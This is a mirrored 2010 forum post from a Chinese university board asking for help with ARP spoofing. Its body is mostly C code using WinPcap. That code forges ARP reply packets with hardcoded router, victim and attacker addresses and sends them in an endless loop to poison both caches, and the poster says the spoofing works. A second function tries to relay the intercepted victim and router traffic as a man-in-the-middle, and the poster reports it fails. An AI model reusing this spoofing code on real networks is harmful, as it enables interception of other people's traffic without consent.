返回信息流欺骗函数为一下代码,欺骗能成功
DWORD WINAPI arp ( LPVOID lParament )
{
//printf("dsfsdf\n");
//pcap_t *adhandle;
pcap_t *adhandle=(pcap_t *)lParament;;
unsigned char packet1[60],packet2[60];
int i;
printf("请输入Router的MAC地址(例FF:FF:FF:FF:FF:FF)\n");
routermac[0]=0x1c;
routermac[1]=0xaf;
routermac[2]=0xf7;
routermac[3]=0x8b;
routermac[4]=0x4f;
routermac[5]=0x44;
//scanf("%2x:%2x:%2x:%2x:%2x:%2x",&routermac[0],&routermac[1],&routermac[2],&routermac[3],&routermac[4],&routermac[5]);
//printf("%2x ",routermac[0]);
printf("请输入被攻击者的MAC地址(例FF:FF:FF:FF:FF:FF)\n");
//scanf("%2x:%2x:%2x:%2x:%2x:%2x",&victimmac[0],&victimmac[1],&victimmac[2],&victimmac[3],&victimmac[4],&victimmac[5]);
/*victimmac[0]=0x00;
victimmac[1]=0x0a;
victimmac[2]=0xe4;
victimmac[3]=0x32;
victimmac[4]=0x53;
victimmac[5]=0xa4;*/
victimmac[0]=0x18;
victimmac[1]=0xa9;
victimmac[2]=0x05;
victimmac[3]=0xdd;
victimmac[4]=0x5e;
victimmac[5]=0x9e;//
printf("请输入攻击者的MAC地址(例FF:FF:FF:FF:FF:FF)\n");
attackermac[0]=0x00;
attackermac[1]=0x15;
attackermac[2]=0x58;
attackermac[3]=0x09;
attackermac[4]=0xe5;
attackermac[5]=0x4f;
//scanf("%2x:%2x:%2x:%2x:%2x:%2x",&attackermac[0],&attackermac[1],&attackermac[2],&attackermac[3],&attackermac[4],&attackermac[5]);
printf("请输入被攻击者的ip地址(例192.168.1.111)\n");
/*victimip[0]=192;
victimip[1]=168;
victimip[2]=0;
victimip[3]=105;*/
victimip[0]=192;
victimip[1]=168;
victimip[2]=0;
victimip[3]=108;//
//scanf("%d.%d.%d.%d",&victimip[0],&victimip[1],&victimip[2],&victimip[3]);
printf("请输入攻击者的ip地址(例192.168.1.111)\n");
attackerip[0]=192;
attackerip[1]=168;
attackerip[2]=0;
attackerip[3]=110;
//scanf("%d.%d.%d.%d",&attackerip[0],&attackerip[1],&attackerip[2],&attackerip[3]);
printf("请输入router的ip地址(例192.168.1.111)\n");
routerip[0]=192;
routerip[1]=168;
routerip[2]=0;
routerip[3]=1;
//scanf("%d.%d.%d.%d",&routerip[0],&routerip[1],&routerip[2],&routerip[3]);
for(i=0;i<6;i++)
packet1[i]=routermac[i];
for(i=6;i<12;i++)
packet1[i]=attackermac[i-6];
// 帧类型
packet1[12]=0x08;
packet1[13]=0x06;
packet1[14]=0x00;
packet1[15]=0x01;
//
packet1[16]=0x08;
packet1[17]=0x00;
/* op */
packet1[18]=0x06;
packet1[19]=0x04;
// ARP回复协议
packet1[20]=0x00;
packet1[21]=0x02;
for(i=22;i<28;i++)
packet1[i]=attackermac[i-22];
for(i=28;i<32;i++)
packet1[i]=victimip[i-28];
for(i=32;i<38;i++)
packet1[i]=routermac[i-32];
for(i=38;i<42;i++)
packet1[i]=routerip[i-38];
for(i=42;i<60;i++)
packet1[i]=0x0;
for(i=0;i<6;i++)
packet2[i]=victimmac[i];
//packet2[0]=0x00;
//packet2[1]=0x22;
//packet2[2]=0x19;
//packet2[3]=0xd0;
//packet2[4]=0x49;
//packet2[5]=0x34;
for(i=6;i<12;i++)
packet2[i]=attackermac[i-6];
// 帧类型
packet2[12]=0x08;
packet2[13]=0x06;
packet2[14]=0x00;
packet2[15]=0x01;
packet2[16]=0x08;
packet2[17]=0x00;
/* op */
packet2[18]=0x06;
packet2[19]=0x04;
// ARP回复协议
packet2[20]=0x00;
packet2[21]=0x02;
for(i=22;i<28;i++)
packet2[i]=attackermac[i-22];
for(i=28;i<32;i++)
packet2[i]=routerip[i-28];
for(i=32;i<38;i++)
packet2[i]=victimmac[i-32];
for(i=38;i<42;i++)
packet2[i]=victimip[i-38];
for(i=42;i<60;i++)
packet2[i]=0x0;
/*=======================================================*/
//int num=0;
while(1)
{
/* 发送数据包 */
if(pcap_sendpacket(adhandle, packet1, 60 /* size */) != 0)
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));
}
if(pcap_sendpacket(adhandle, packet2, 60 /* size */) != 0)
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));
}
Sleep(500);//每隔3秒发一次arp数据包
//printf("the num is %d ",num);
//num++;
}
}
欺骗后为了让被欺骗的机器能上网用修复函数如下:但是修复不成功啊。。。不知道问题出在哪?
void packeten(const u_char *pkt_data,int packlen,pcap_t *adhandle)
{
int i;
//int querylen;
u_char buff[5000];
u_char packet[5000];
//u_char query[100];
//struct iphdr ipheader;
//unsigned short udplen;
//u_char *p;
for(i=0;i<packlen;i++)
buff[i]=pkt_data[i];
if(buff[0]==attackermac[0]&&buff[1]==attackermac[1]&&buff[2]==attackermac[2]&&buff[3]==attackermac[3]&&buff[4]==attackermac[4]&&buff[5]==attackermac[5]&&buff[6]==victimmac[0]&&buff[7]==victimmac[1]&&buff[8]==victimmac[2]&&buff[9]==victimmac[3]&&buff[10]==victimmac[4]&&buff[11]==victimmac[5]/*&&buff[30]==0xc0&&buff[31]==0xa8&&buff[32]==0x01&&buff[33]==0x01&&!(buff[23]==0x11&&buff[37]==0x35)*/)
{
//把被攻击者发给路由器的数据包转发给路由器routermac[6] attackermac[6] victimmac[6]
//packet[0]=0x00;packet[1]=0x19;packet[2]=0xe0;packet[3]=0xc7;packet[4]=0xb1;packet[5]=0xe6;
for(i=0;i<6;i++)
buff[i]=routermac[i];
/* 发送数据包 */
r++;
if(pcap_sendpacket(adhandle, buff, packlen /* size */) != 0)
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));
}
printf("sendtoroute %d %d\n",r,packlen);
}
else if(buff[0]==attackermac[0]&&buff[1]==attackermac[1]&&buff[2]==attackermac[2]&&buff[3]==attackermac[3]&&buff[4]==attackermac[4]&&buff[5]==attackermac[5]&&buff[6]==routermac[0]&&buff[7]==routermac[1]&&buff[8]==routermac[2]&&buff[9]==routermac[3]&&buff[10]==routermac[4]&&buff[11]==routermac[5]/*&&!(buff[23]==0x11&&buff[35]==0x35)&&buff[30]==0xc0&&buff[31]==0xa8&&buff[32]==0x01&&buff[33]==0xa7*/)
{//把路由器发给被攻击者的数据包转发给被攻击者
//packet[0]=0x00;packet[1]=0x22;packet[2]=0x19;packet[3]=0xd0;packet[4]=0x49;packet[5]=0x34;
for(i=0;i<6;i++)
buff[i]=victimmac[i];
v++;
/* 发送数据包 */
if(pcap_sendpacket(adhandle, buff, packlen /* size */) != 0)
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));
}
printf("sendtovictim %d %d\n",v,packlen);
}
}
这是一条镜像帖。来源:北邮人论坛 / cpp / #43077同步于 2010/9/1
该镜像源已超过 30 天没有更新,可能在源站已被删除。
CPP机器人发帖
问一个arp欺骗问题
nsyncxy
2010/9/1镜像同步3 回复
订阅后,新回复会通过你的通知中心匿名送达。